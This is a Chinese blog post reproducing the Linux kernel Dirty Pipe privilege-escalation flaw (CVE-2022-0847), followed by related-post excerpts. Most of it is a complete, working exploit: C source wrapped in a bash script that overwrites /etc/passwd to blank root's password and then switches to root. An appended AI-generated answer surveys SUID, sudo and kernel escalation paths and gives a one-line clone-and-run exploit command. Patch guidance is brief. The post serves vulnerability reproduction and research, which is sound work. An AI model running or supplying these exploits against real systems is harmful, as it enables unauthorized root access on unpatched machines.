Dirty Pipe – Linux 内核本地提权漏洞

最新推荐文章于 2023-09-15 20:33:01 发布
原创 最新推荐文章于 2023-09-15 20:33:01 发布 · 6.6k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #debian #安全 #linux提权

本文详细介绍了Linux内核中的CVE-2022-0847( DirtyPipe )漏洞,该漏洞存在于5.8及以后版本,允许攻击者覆盖并修改任意可读文件,从而实现本地提权。漏洞原理类似DirtyCow,但更易利用。受影响的Linux内核版本包括5.8到5.16.11/5.15.25/5.10.102。文章提供了漏洞复现步骤、PoC代码以及解决方案,建议受影响用户更新内核至5.16.11或更高版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞简介

CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。

CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。

二、影响范围

5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

三、漏洞复现

测试环境:Linux kali 5.15.0-kali3-amd64 #1 SMP Debian 5.15.15-2kali1 (2022-01-31) x86_64 GNU/Linux

1、下载poc到kali,赋予Dirty-Pipe.sh执行权限

cd CVE-2022-0847
chmod +x Dirty-Pipe.sh

2、开始提权

bash ./Dirty-Pipe.sh

四、poc

#/bin/bash
cat>exp.c<<EOF
/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}
EOF

gcc exp.c -o exp -std=c99

# 备份密码文件
cp /etc/passwd /tmp/passwd
passwd_tmp=$(cat /etc/passwd|head)
./exp /etc/passwd 1 "${passwd_tmp/root:x/oot:}"

echo -e "\n# 恢复原来的密码\nrm -rf /etc/passwd\nmv /tmp/passwd /etc/passwd"

# 现在可以无需密码切换到root账号
su root

五、解决方案

更新升级 Linux 内核到以下安全版本:

  • Linux 内核 >= 5.16.11
  • Linux 内核 >= 5.15.25
  • Linux 内核 >= 5.10.102

转载请注明:Adminxe's Blog » Dirty Pipe – Linux 内核本地提权漏洞

Linux系统漏洞本地
xiongIT的博客
11-23 2264
如何预防Linux系统漏洞本地
Linux DirtyPipe内核漏洞(CVE-2022-0847)复现与分析
SHELLCODE_8BIT的博客
10-27 2328
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe
[CVE-2022-0847][Dirty Pipe]Linux内核漏洞
whoami
03-08 464
一、漏洞背景 漏洞原理与脏牛漏洞(CVE-2016-5195)类似,攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而将普通限的用户升至root限。 二、影响版本 Linux kernel >= 5.8 , < 5.16.11 / 5.15.25 / 5.10.102 三、漏洞分析 The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation 要利用此漏洞,需要: 创
Linux本地漏洞复现与检测思路
weixin_46137328的博客
10-15 2183
我做的是linux本地漏洞的复现。但本地漏洞并不像其他web漏洞一样,可以直接pull一个docker镜像就ok了,的洞复杂在于配置环境,基本都是在虚拟机里复现,一个镜像的大...
Linux sudo 本地漏洞复现(CVE-2019-14287)
大哥一声吼
10-15 848
10月14日 Unix 、 Linux 爆出了一个严重的本地漏洞 通过一个拥有 sudo 限的用户,在特定场景下可以执行任意的root 命令 漏洞演示环境搭建如下 第一步修改配置文件 vim /etc/sudoers 在 root ALL=(ALL:ALL) ALL 下面添加一行测试用户内容 alice ALL = (ALL,!root) /usr/bin/vi,/usr/...
Linux Kernel本地漏洞(CVE-2022-0847)漏洞复现
mingyqf的博客
03-08 3545
参考: TeamsSix 参考链接:https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w 0x00 前言 CVSS 评分:7.8 影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102 RT 通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通限的用户升到特 root 这个漏洞作者将其命名为了 Dirty Pipe,一看到这名字讲道理就让人想到了 Dirty Cow,这是
Linux内核漏洞(Dirty-pipe)复现
qq_69775412的博客
07-25 778
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
漏洞复现】Linux DirtyPipe 内核漏洞 (CVE-2022-0847)
李火火的安全圈
03-08 2620
文章目录声明一、漏洞描述二、影响版本三、漏洞复现四、修复建议五、参考链接 声明 本文章仅限于漏洞复现以及技术研究,切勿用于非法用途,切记! 一、漏洞描述 它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致升,因为非特进程可以将代码注入根进程。 CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可
CVE-2022-0847(Dirty Pipe)Linux内核漏洞预警与修复方案
ichunqiu2018的博客
03-09 2223
【高危漏洞预警】Dirty Pipe漏洞影响Linux内核5.8及以后版本,且漏洞利用简单。本篇由伽玛实验室对该漏洞进行的分析和研究,并给出具体的修复方案。醒各位师傅及早修复!
漏洞情报 | CVE-2022-0847 Linux 本地内核漏洞(剑幕支持检测)
moresec的博客
03-11 6525
默安科技剑幕目前已支持该漏洞的检测。
linux本地漏洞,Linux本地漏洞 请立即更新udev程序
weixin_39847099的博客
05-16 91
2011-11-28 13:03朋友你好!我刚开始搞linux,碰到了很多问题,想问你下,希望能帮我解答下。下面是我的一段shell 程序#!/bin/shwhile [ 0 ]doread scoreif [ $score -lt 60 ];thenecho " you must work hard!"elif [ $score -lt 80 ]echo " just so so,you sho...
Linux DirtyPipe内核漏洞(CVE-2022-0847)
chaojixiaojingang
03-11 9660
1.漏洞描述 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞Dirty Cow),但它更容易被利用。 2.漏洞影响范围 linux内核5.8及之后的版本 PS:该漏洞已 在 Linux 5.16.11、5.15.25 和 5.10.102 中修复 3.漏洞环境...
Linux 曝出 sudo 漏洞,以 root 用户身份执行任意命令
JackTian
10-17 546
点击上方“杰哥的IT之旅”,选择“设为星标”干货、福利第一时间送达!作为Linux中最常使用的重要实用程序之一,sudo几乎安装在每一款UNIX和Linux发行版上的,以...
linux本地漏洞,漏洞预警 | Ubuntu存在本地漏洞(附EXP及应对措施)
weixin_42566108的博客
05-16 498
今天下午,Twitter 用户 @Vitaly Nikolenko 发布消息,称 ubuntu 最新版本(Ubuntu 16.04)存在高危的本地漏洞,而且推文中还附上了 EXP 下载地址。Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux。此次发布的 EXP 即为 CVE-2017-16995 Linux 内核漏洞的攻击代码。该漏洞存在于L...
Linux内核漏洞(Dirty-pipe)复现_linux漏洞
qq_53058639的博客
09-15 384
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
Linux 本地漏洞
李火火的安全圈
03-30 2255
文章目录前言一、漏洞描述二、漏洞级别三、影响范围四、漏洞细节五、漏洞类型六、本地复现七、修复建议 前言 本文章仅用于漏洞复现和技术研究,切勿非法攻击,出现任何事故与本作者无关,切记! 一、漏洞描述 Linux内核中 net/ipv4/esp4.c 和 net/ipv6/esp6.c中的 IPsec ESP 转换代码中发现堆缓冲区溢出漏洞。该漏洞允许具有正常用户限的本地攻击者覆盖内核中的堆对象,最终获取root限。 二、漏洞级别 高危 三、影响范围 Linux kernel < 5.17
linux漏洞内核版本,关于linux内核本地漏洞CVE-2017-16995
weixin_39642990的博客
05-03 360
漏洞概述Jann Horn发现内核中Berkeley Packet Filter(BPF)实现中, Linux内核4.14.8版本开始kernel/bpf/ verifier.c源码中的check_alu_op函数启用了不正确地执行符号扩展,可导致内存任意读写漏洞。一般用户可利用这个漏洞,实现任意代码,获得本地操作。日前, CVE-2017-16995的Linux内核漏洞攻击代码被发布:影响版...
linux 内核 expr6,漏洞预警|Linux内核本地漏洞分析(CVE-2019-13272)
weixin_29994587的博客
05-02 269
漏洞描述近日,HSCERT监测发现Linux修复了一个本地内核漏洞,利用此漏洞,攻击者可将普通用户升为Root限。HSCERT研判此漏洞为严重漏洞,攻击者拿到本地限可以直接至root。漏洞分析当调用PTRACE_TRACEME时,ptrace_link()将获得对父级目标凭据的RCU引用,然后把该指针指向get_cred()函数。但是,对象struct cred的生存周期不允许无...
Dirty Pipe linux内核漏洞分析(CVE-2022-0847)
weixin_51804748的博客
04-01 4955
漏洞原理 Pipe机制 本质上来说,管道(pipe)就是一种进程间通信的手段,让两个进程可以通过pipe 发送和接收数据。 Page Cache机制 磁盘的IO读写速度是很慢的,所以一般当我们访问一个磁盘文件的时候,首先会将其内容装载到物理内存中,后续的访问都是直接取内存中的副本来读取数据。因为一个文件的内存副本,后续可能会被很多进程打开使用。(想想是不是,平常我们的微信软件可能打开本地的一个文本,word软件也可能打开同一个文本)。为了保证大家都能快速的访问,Linux设计了这样一个Page Cache
Linux如何
最新发布
07-07
Linux系统中的方法主要包括利用系统配置错误、漏洞利用以及限管理工具的误用等手段。以下是几种常见的方式及其操作步骤: ### SUID SUID(Set User ID)是一种特殊的文件限设置,允许用户以文件所有者的身份执行程序。如果某些可执行文件被设置了SUID位,并且这些文件存在设计缺陷或可以被用来调用shell,则可能被用来限。 - **设置SUID限**:可以通过`chmod u+s filename`命令为某个可执行文件添加SUID限。 - **查找具有SUID限的文件**:使用`find / -type f -perm -04000 -ls 2>/dev/null`可以帮助定位系统中所有设置了SUID位的文件。 - **利用SUID**:当发现一个具有SUID限并且能够供交互式shell或者执行任意命令的程序时,攻击者可以直接运行该程序来获得更高限[^1]。 ### 内核漏洞 未修复的内核漏洞能够直接绕过系统的限控制机制。由于内核是操作系统的核心组成部分,一旦存在漏洞,攻击者就有可能利用这些漏洞获取更高的限。 - **确认内核版本**:使用`uname -a`查看当前内核信息。 - **检测潜在漏洞**:可以借助自动化工具如`linux-exploit-suggester.sh`脚本来匹配已知漏洞与当前内核版本是否相符。 - **利用具体漏洞**:例如Dirty Pipe (CVE-2022-0847)这样的特定漏洞,通过编写和编译相应的exploit代码尝试获取root访问[^2]。 ### sudo sudo机制允许普通用户根据安全策略执行一些或全部的root命令。不当配置可能导致升的机会。 - **编辑sudoers文件**:始终通过`visudo`命令安全地编辑`/etc/sudoers`文件,确保语法正确无误。 - **限制限分配**:遵循最小限原则,在sudoers文件中精确指定每个用户的限范围,避免给予过多不必要的特。 - **利用sudo**:若发现有过于宽松的sudo规则(比如NOPASSWD选项),则可能无需密码即可执行敏感操作;此外,某些情况下还可以利用sudo的环境变量处理不当等问题进行[^4]。 ### 其他技术 除了上述方法外,还有其他类型的途径,比如利用服务程序中的缓冲区溢出漏洞本地竞态条件问题或是第三方软件安装后遗留的安全隐患等。 ```bash # 示例:使用DirtyPipe漏洞 git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits make && ./exploit /etc/passwd 1 'root::0:0::/root:/bin/bash' ``` 为了防止非法行为的发生,建议采取以下防御措施: - 定期更新系统和应用程序至最新稳定版。 - 对关键服务实施严格的访问控制策略。 - 监控异常活动并及时响应可疑登录尝试。 - 教育用户关于最佳实践的知识,减少人为失误带来的风险。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值